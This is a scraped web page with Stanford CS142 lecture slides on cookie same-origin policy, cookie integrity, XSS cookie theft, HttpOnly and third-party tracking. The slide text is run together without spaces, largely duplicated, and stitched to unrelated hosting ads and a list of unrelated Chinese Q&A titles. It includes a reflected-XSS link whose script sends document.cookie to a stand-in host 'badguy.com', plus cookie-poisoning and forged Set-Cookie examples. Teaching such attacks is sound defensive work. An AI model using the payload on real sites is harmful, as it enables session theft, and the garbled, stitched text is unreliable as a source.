overwritesphpecho
phpecho 时间:2021-05-20 阅读:()
CookieSameOriginPolicyDanBonehCS142Winter2009Monday:sessionmanagementusingcookiesSameoriginpolicy:"highlevel"Review:SameOriginPolicy(SOP)forDOM:OriginAcanaccessoriginB'sDOMifmatchon(scheme,domain,port)Today:SameOriginalPolicy(SOP)forcookies:Generallyspeaking,basedon:([scheme],domain,path)optionalscheme://domain:port/pathparamsscopeSetting/deletingcookiesbyserverDeletecookiebysetting"expires"todateinpastDefaultscopeisdomainandpathofsettingURLBrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;domain=(whentosend);path=(whentosend)secure=(onlysendoverSSL);expires=(whenexpires);HttpOnly(later)ifexpires=NULL:thissessiononlyScopesettingrules(writeSOP)domain:anydomain-suffixofURL-hostname,exceptTLDexample:host="login.
site.
com"login.
site.
comcansetcookiesforallof.
site.
combutnotforanothersiteorTLDProblematicforsiteslike.
stanford.
edupath:canbesettoanythingalloweddomainslogin.
site.
com.
site.
comdisalloweddomainsuser.
site.
comothersite.
com.
comCookiesareidentifiedby(name,domain,path)Bothcookiesstoredinbrowser'scookiejar;bothareinscopeoflogin.
site.
comcookie1name=useridvalue=testdomain=login.
site.
compath=/securecookie2name=useridvalue=test123domain=.
site.
compath=/securedistinctcookiesReadingcookiesonserver(readSOP)BrowsersendsallcookiesinURLscope:cookie-domainisdomain-suffixofURL-domain,andcookie-pathisprefixofURL-path,and[protocol=HTTPSifcookieis"secure"]Goal:serveronlyseescookiesinitsscopeBrowserServerGET//URL-domain/URL-pathCookie:NAME=VALUEExampleshttp://checkout.
site.
com/http://login.
site.
com/https://login.
site.
com/cookie1name=useridvalue=u1domain=login.
site.
compath=/securecookie2name=useridvalue=u2domain=.
site.
compath=/non-securebothsetbylogin.
site.
comcookie:userid=u2cookie:userid=u2cookie:userid=u1;userid=u2(arbitraryorder)Clientsideread/write:document.
cookieSettingacookieinJavascript:document.
cookie="name=value;expires=…;"Readingacookie:alert(document.
cookie)printsstringcontainingallcookiesavailablefordocument(basedon[protocol],domain,path)Deletingacookie:document.
cookie="name=;expires=Thu,01-Jan-70"document.
cookieoftenusedtocustomizepageinJavascriptjavascript:alert(document.
cookie)JavascriptURLDisplaysallcookiesforcurrentdocumentViewing/deletingcookiesinBrowserUICookieprotocolproblemsServerisblind:Doesnotseecookieattributes(e.
g.
secure)DoesnotseewhichdomainsetthecookieServeronlysees:Cookie:NAME=VALUEExample1:loginserverproblemsAlicelogsinatlogin.
site.
comlogin.
site.
comsetssession-idcookiefor.
site.
comAlicevisitsevil.
site.
comoverwrites.
site.
comsession-idcookiewithsession-idofuser"badguy"Alicevisitscs142hw.
site.
comtosubmithomework.
cs142hw.
site.
comthinksitistalkingto"badguy"Problem:cs142hwexpectssession-idfromlogin.
site.
com;cannottellthatsession-idcookiewasoverwrittenExample2:"secure"cookiesarenotsecureAlicelogsinathttps://www.
google.
com/accountsAlicevisitshttp://www.
google.
com(cleartext)NetworkattackercaninjectintoresponseSet-Cookie:LSID=badguy;secureandoverwritesecurecookieProblem:networkattackercanre-writeHTTPScookies!
HTTPScookievaluecannotbetrustedInteractionwiththeDOMSOPCookieSOP:pathseparationx.
com/Adoesnotseecookiesofx.
com/BNotasecuritymeasure:DOMSOP:x.
com/AhasaccesstoDOMofx.
com/Balert(frames[0].
document.
cookie);Pathseparationisdoneforefficiencynotsecurity:x.
com/AisonlysentthecookiesitneedsCookieshavenointegrity!
!
Storingsecuritydataonbrowser–Usercanchangeanddeletecookievalues!
!
Editcookiefile(FF3:cookies.
sqlite)ModifyCookieheader(FF:TamperDataextension)–Sillyexample:shoppingcartsoftwareSet-cookie:shopping-cart-total=150($)–Usereditscookiefile(cookiepoisoning):Cookie:shopping-cart-total=15($)Similartoproblemwithhiddenfields1617Notsosilly…(asof2/2000)D3.
COMPtyLtd:ShopFactory5.
8@RetailCorporation:@RetailAdgrafix:CheckItOutBaronConsultingGroup:WebSiteToolComCityCorporation:SalesCartCrestedButteSoftware:EasyCartDansie.
net:DansieShoppingCartIntelligentVendingSystems:IntellivendMake-a-Store:Make-a-StoreOrderPageMcMurtrey/Whitaker&Associates:Cart323.
0pknutsen@nethut.
no:CartMan1.
04RichMediaTechnologies:JustAddCommerce5.
0SmartCart:SmartCartWebExpress:Shoptron1.
2Source:http://xforce.
iss.
net/xforce/xfdb/4621Solution:cryptographicchecksums"value"shouldalsocontaindatatopreventcookiereplayandswapGoal:dataintegrityRequiressecretkeykunknowntobrowserBrowserServerkSet-Cookie:NAME=valueTCookie:NAME=valueTGeneratetag:T←F(k,value)Verifytag:T=F(k,value)19Example:.
NET2.
0–System.
Web.
Configuration.
MachineKeySecretwebserverkeyintendedforcookieprotectionStoredonallwebserversinsiteCreatinganencryptedcookiewithintegrity:–HttpCookiecookie=newHttpCookie(name,val);HttpCookieencodedCookie=HttpSecureCookie.
Encode(cookie);Decryptingandvalidatinganencryptedcookie:–HttpSecureCookie.
Decode(cookie);Cookietheft:basiccrosssitescripting(XSS)Example:reflectedXSSsearchfieldonvictim.
com:http://victim.
com/search.
phpterm=appleServer-sideimplementationofsearch.
php:SearchResultsResultsfor:.
.
.
echosearchtermintoresponseBadinputConsiderlink:(properlyURLencoded)http://victim.
com/search.
phpterm=window.
open("http://badguy.
comcookie="+document.
cookie)Whatifuserclicksonthislink1.
Browsergoestovictim.
com/search.
php2.
Victim.
comreturnsResultsfor…3.
Browserexecutesscript:Sendsbadguy.
comcookieforvictim.
com23SowhatWhywoulduserclickonsuchalinkPhishingemailLinkindoubleclickbannerad…manymanywaystofooluserintoclickingMANYotherformsofXSS(monday)ManydonotrequireclickingonlinksHttpOnlyCookiesIE6SP1,FF2.
0.
0.
5BrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;HttpOnlyCookiesentoverHTTP(s),butnotaccessibletoscriptscannotbereadviadocument.
cookieAlsoblocksaccessfromXMLHttpRequestheadersHelpspreventcookietheftviaXSS…butdoesnotstopmostotherrisksofXSSbugs.
(notSafari)THEEND3rdPartyCookies:usertracking3rdpartycookiesWhattheyare:UsergoestositeA.
com;obtainspagePagecontainsBrowsergoestoB.
com;obtainspageHTTPresponsecontainscookieCookiefromB.
comiscalleda3rdpartycookieTracking:UsergoestositeD.
comD.
comcontainsB.
comobtainscookiesetwhenvisitedA.
comB.
comknowsuservisitedA.
comandD.
comCanweblock3rdpartycookiesIEandSafari:blockset/writeIgnorethe"Set-Cookie"HTTPheaderfrom3rdpartiesSitesetscookieasa1stparty;willbegivencookiewhencontactedasa3rdpartyEnabledbydefaultinIE7FirefoxandOpera:blocksend/readAlwaysimplement"Set-Cookie",butneversendcookiesto3rdpartyBreakssess.
mgmt.
atseveralsites(offbydefault)Effectivenessof3rdpartyblockingIneffectiveforimprovingprivacy3rdpartycanbecomefirstpartyandthensetcookieFlashcookiesnotcontrolledbybrowsercookiepolicyIE8InPrivatebrowsingandChromeincognitoUponexit,deleteallbrowserstatecollectedwhileinprivatebrowsing
site.
com"login.
site.
comcansetcookiesforallof.
site.
combutnotforanothersiteorTLDProblematicforsiteslike.
stanford.
edupath:canbesettoanythingalloweddomainslogin.
site.
com.
site.
comdisalloweddomainsuser.
site.
comothersite.
com.
comCookiesareidentifiedby(name,domain,path)Bothcookiesstoredinbrowser'scookiejar;bothareinscopeoflogin.
site.
comcookie1name=useridvalue=testdomain=login.
site.
compath=/securecookie2name=useridvalue=test123domain=.
site.
compath=/securedistinctcookiesReadingcookiesonserver(readSOP)BrowsersendsallcookiesinURLscope:cookie-domainisdomain-suffixofURL-domain,andcookie-pathisprefixofURL-path,and[protocol=HTTPSifcookieis"secure"]Goal:serveronlyseescookiesinitsscopeBrowserServerGET//URL-domain/URL-pathCookie:NAME=VALUEExampleshttp://checkout.
site.
com/http://login.
site.
com/https://login.
site.
com/cookie1name=useridvalue=u1domain=login.
site.
compath=/securecookie2name=useridvalue=u2domain=.
site.
compath=/non-securebothsetbylogin.
site.
comcookie:userid=u2cookie:userid=u2cookie:userid=u1;userid=u2(arbitraryorder)Clientsideread/write:document.
cookieSettingacookieinJavascript:document.
cookie="name=value;expires=…;"Readingacookie:alert(document.
cookie)printsstringcontainingallcookiesavailablefordocument(basedon[protocol],domain,path)Deletingacookie:document.
cookie="name=;expires=Thu,01-Jan-70"document.
cookieoftenusedtocustomizepageinJavascriptjavascript:alert(document.
cookie)JavascriptURLDisplaysallcookiesforcurrentdocumentViewing/deletingcookiesinBrowserUICookieprotocolproblemsServerisblind:Doesnotseecookieattributes(e.
g.
secure)DoesnotseewhichdomainsetthecookieServeronlysees:Cookie:NAME=VALUEExample1:loginserverproblemsAlicelogsinatlogin.
site.
comlogin.
site.
comsetssession-idcookiefor.
site.
comAlicevisitsevil.
site.
comoverwrites.
site.
comsession-idcookiewithsession-idofuser"badguy"Alicevisitscs142hw.
site.
comtosubmithomework.
cs142hw.
site.
comthinksitistalkingto"badguy"Problem:cs142hwexpectssession-idfromlogin.
site.
com;cannottellthatsession-idcookiewasoverwrittenExample2:"secure"cookiesarenotsecureAlicelogsinathttps://www.
google.
com/accountsAlicevisitshttp://www.
google.
com(cleartext)NetworkattackercaninjectintoresponseSet-Cookie:LSID=badguy;secureandoverwritesecurecookieProblem:networkattackercanre-writeHTTPScookies!
HTTPScookievaluecannotbetrustedInteractionwiththeDOMSOPCookieSOP:pathseparationx.
com/Adoesnotseecookiesofx.
com/BNotasecuritymeasure:DOMSOP:x.
com/AhasaccesstoDOMofx.
com/Balert(frames[0].
document.
cookie);Pathseparationisdoneforefficiencynotsecurity:x.
com/AisonlysentthecookiesitneedsCookieshavenointegrity!
!
Storingsecuritydataonbrowser–Usercanchangeanddeletecookievalues!
!
Editcookiefile(FF3:cookies.
sqlite)ModifyCookieheader(FF:TamperDataextension)–Sillyexample:shoppingcartsoftwareSet-cookie:shopping-cart-total=150($)–Usereditscookiefile(cookiepoisoning):Cookie:shopping-cart-total=15($)Similartoproblemwithhiddenfields1617Notsosilly…(asof2/2000)D3.
COMPtyLtd:ShopFactory5.
8@RetailCorporation:@RetailAdgrafix:CheckItOutBaronConsultingGroup:WebSiteToolComCityCorporation:SalesCartCrestedButteSoftware:EasyCartDansie.
net:DansieShoppingCartIntelligentVendingSystems:IntellivendMake-a-Store:Make-a-StoreOrderPageMcMurtrey/Whitaker&Associates:Cart323.
0pknutsen@nethut.
no:CartMan1.
04RichMediaTechnologies:JustAddCommerce5.
0SmartCart:SmartCartWebExpress:Shoptron1.
2Source:http://xforce.
iss.
net/xforce/xfdb/4621Solution:cryptographicchecksums"value"shouldalsocontaindatatopreventcookiereplayandswapGoal:dataintegrityRequiressecretkeykunknowntobrowserBrowserServerkSet-Cookie:NAME=valueTCookie:NAME=valueTGeneratetag:T←F(k,value)Verifytag:T=F(k,value)19Example:.
NET2.
0–System.
Web.
Configuration.
MachineKeySecretwebserverkeyintendedforcookieprotectionStoredonallwebserversinsiteCreatinganencryptedcookiewithintegrity:–HttpCookiecookie=newHttpCookie(name,val);HttpCookieencodedCookie=HttpSecureCookie.
Encode(cookie);Decryptingandvalidatinganencryptedcookie:–HttpSecureCookie.
Decode(cookie);Cookietheft:basiccrosssitescripting(XSS)Example:reflectedXSSsearchfieldonvictim.
com:http://victim.
com/search.
phpterm=appleServer-sideimplementationofsearch.
php:SearchResultsResultsfor:.
.
.
echosearchtermintoresponseBadinputConsiderlink:(properlyURLencoded)http://victim.
com/search.
phpterm=window.
open("http://badguy.
comcookie="+document.
cookie)Whatifuserclicksonthislink1.
Browsergoestovictim.
com/search.
php2.
Victim.
comreturnsResultsfor…3.
Browserexecutesscript:Sendsbadguy.
comcookieforvictim.
com23SowhatWhywoulduserclickonsuchalinkPhishingemailLinkindoubleclickbannerad…manymanywaystofooluserintoclickingMANYotherformsofXSS(monday)ManydonotrequireclickingonlinksHttpOnlyCookiesIE6SP1,FF2.
0.
0.
5BrowserServerGET…HTTPHeader:Set-cookie:NAME=VALUE;HttpOnlyCookiesentoverHTTP(s),butnotaccessibletoscriptscannotbereadviadocument.
cookieAlsoblocksaccessfromXMLHttpRequestheadersHelpspreventcookietheftviaXSS…butdoesnotstopmostotherrisksofXSSbugs.
(notSafari)THEEND3rdPartyCookies:usertracking3rdpartycookiesWhattheyare:UsergoestositeA.
com;obtainspagePagecontainsBrowsergoestoB.
com;obtainspageHTTPresponsecontainscookieCookiefromB.
comiscalleda3rdpartycookieTracking:UsergoestositeD.
comD.
comcontainsB.
comobtainscookiesetwhenvisitedA.
comB.
comknowsuservisitedA.
comandD.
comCanweblock3rdpartycookiesIEandSafari:blockset/writeIgnorethe"Set-Cookie"HTTPheaderfrom3rdpartiesSitesetscookieasa1stparty;willbegivencookiewhencontactedasa3rdpartyEnabledbydefaultinIE7FirefoxandOpera:blocksend/readAlwaysimplement"Set-Cookie",butneversendcookiesto3rdpartyBreakssess.
mgmt.
atseveralsites(offbydefault)Effectivenessof3rdpartyblockingIneffectiveforimprovingprivacy3rdpartycanbecomefirstpartyandthensetcookieFlashcookiesnotcontrolledbybrowsercookiepolicyIE8InPrivatebrowsingandChromeincognitoUponexit,deleteallbrowserstatecollectedwhileinprivatebrowsing
- overwritesphpecho相关文档
- todayphpecho
- Wordpress自定义页面(非模版)
- contributingphpecho
- Wordpress中如何添加博客被访问的总次数
- _dependentTablesphpecho
- Futurephpecho
ZJI韩国BGP+CN2服务器,440元起
ZJI又上新了!商家是原Wordpress圈知名主机商:维翔主机,成立于2011年,2018年9月启用新域名ZJI,提供中国香港、台湾、日本、美国独立服务器(自营/数据中心直营)租用及VDS、虚拟主机空间、域名注册等业务。本次商家新上韩国BGP+CN2线路服务器,国内三网访问速度优秀,适用8折优惠码,优惠后韩国服务器最低每月440元起。韩国一型CPU:Intel 2×E5-2620 十二核二十四线...
Hosteons:新上1Gbps带宽KVM主机$21/年起,AMD Ryzen CPU+NVMe高性能主机$24/年起_韩国便宜服务器
我们在去年12月分享过Hosteons新上AMD Ryzen9 3900X CPU及DDR4内存、NVMe硬盘的高性能VPS产品的消息,目前商家再次发布了产品更新信息,暂停新开100M带宽KVM套餐,新订单转而升级为新的Budget KVM VPS(SSD)系列,带宽为1Gbps端口,且配置大幅升级,目前100M带宽仅保留OpenVZ架构产品可新订购,所有原有主机不变,用户一直续费一直可用。Bud...
A2Hosting三年付$1.99/月,庆祝18周年/WordPress共享主机最高优惠81%/100GB SSD空间/无限流量
A2Hosting主机,A2Hosting怎么样?A2Hosting是UK2集团下属公司,成立于2003年的老牌国外主机商,产品包括虚拟主机、VPS和独立服务器等,数据中心提供包括美国、新加坡softlayer和荷兰三个地区机房。A2Hosting在国外是一家非常大非常有名气的终合型主机商,拥有几百万的客户,非常值得信赖,国外主机论坛对它家的虚拟主机评价非常不错,当前,A2Hosting主机庆祝1...
phpecho为你推荐
-
combininggoogleTesttorealgoogle更新iphonecss3圆角如何用CSS实现圆角矩形?windows键是哪个Win键是什么?iphone连不上wifi我的苹果手机连不上无线,其它手机能,怎么回事?只是家里的连不上127.0.0.1127.0.0.1打不开iphonewifi苹果手机怎样设置Wi-Fi静态IP?google中国地图谷歌卫星地图中文版下载在哪下??